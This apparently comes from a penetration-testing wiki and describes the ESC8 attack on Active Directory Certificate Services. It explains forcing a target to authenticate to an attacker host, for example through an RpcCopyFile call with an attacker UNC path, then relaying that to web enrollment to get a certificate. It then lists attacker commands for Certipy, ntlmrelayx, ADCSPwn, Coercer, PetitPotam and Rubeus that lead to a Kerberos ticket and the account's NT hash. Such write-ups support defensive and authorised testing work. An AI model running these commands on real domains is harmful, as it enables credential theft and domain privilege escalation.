ESC8

TL;DR
ESC8 lets you obtain a certificate on behalf of an elevated computer/user account and use that certificate for client authentication using Kerberos.

A template can be vulnerable to ESC8 if the certificate enrollment web interface is available, typically running at http://[AD CS Server]/certserv/. This HTTP-based certificate enrollment interface is vulnerable to an NTLM relay attack that would allow an attacker to obtain a certificate as another user or computer account.

To exploit ESC8, we need a method of coercing a target computer to authenticate to an attacker controller computer. This is commonly done by abusing Remote Procedure Call (RPC) interfaces on a computer that would allow the attacker to trigger authentication.

An RPC function, RpcCopyFile, exists that takes three arguments: a SrcFile UNC path, a DstFile UNC path, and any flags you want to give it.

The RpcCopyFile function will simply attempt to copy the file given in the SrcFile path to the location in the DstFile path. However, if the SrcFile path leads to a different computer, the target computer you send the RPC function to will attempt to get the SrcFile from the other computer.

Putting it all together, if you want to coerce a target computer to authenticate to your attacker's computer, send them the following RPC function call:

RpcCopyFile(SrcFile="\\attacker_ip\share\file.txt", DstFile="C:\Temp\file.txt")

When the target computer attempts to authenticate to the attacker computer, we will then need to relay the authentication traffic from the target computer to the HTTP-based certificate enrollment interface.

Once the certificate is obtained, we can use the certificate to obtain a Kerberos Ticket Granting Ticket (TGT) for the computer account using the PKINIT Kerberos extension.

Check out UnPAC The Hash to learn how we can obtain the account's NTLM hash using PKINIT.

Exploit

Set Up Relay On Attacker Computer

GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuseGitHub

Linux (Attacker)

certipy relay -target 'http://[CA FDQN]' -template [template]

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub

Linux (Attacker)

ntlmrelayx.py -t http://[CA FDQN]/certsrv/certfnsh.asp -smb2support --adcs

If you are going to relay authentication from a Domain Controller, you must add --template DomainController to your command.

GitHub - bats3c/ADCSPwn: A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service.GitHub

Linux/Windows (Attacker)

ADCSPwn.exe --adcs [CA FQDN]

If successful, impacket-ntlmrelayx will give you the obtained certificate in base64 format

Coerce A Target Computer To Authenticate to the Attacker's Computer

GitHub - p0dalirius/Coercer: A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 12 methods.GitHub

Linux (Attacker)

Coercer coerce -l [attacker ip] -t [target ip] -u [username] -p [password] -d [domain]

GitHub - topotam/PetitPotam: PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.GitHub

Linux (Attacker)

PetitPotam.py [listener] [target]

Obtain The Target Computer Account's NT Hash

GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuseGitHub

Linux

certipy auth -pfx [.pfx output] -dc-ip [DC IP]

Takes the certificate in .pfx format

GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub

Windows

Rubeus.exe asktgt /user:[user] /domain:[domain] /dc:[DC FDQN] /getcredentials /certificate:[base64 certificate]

Takes the certificate in base-64 format

PreviousESC6 NextESC11

Last updated 1 year ago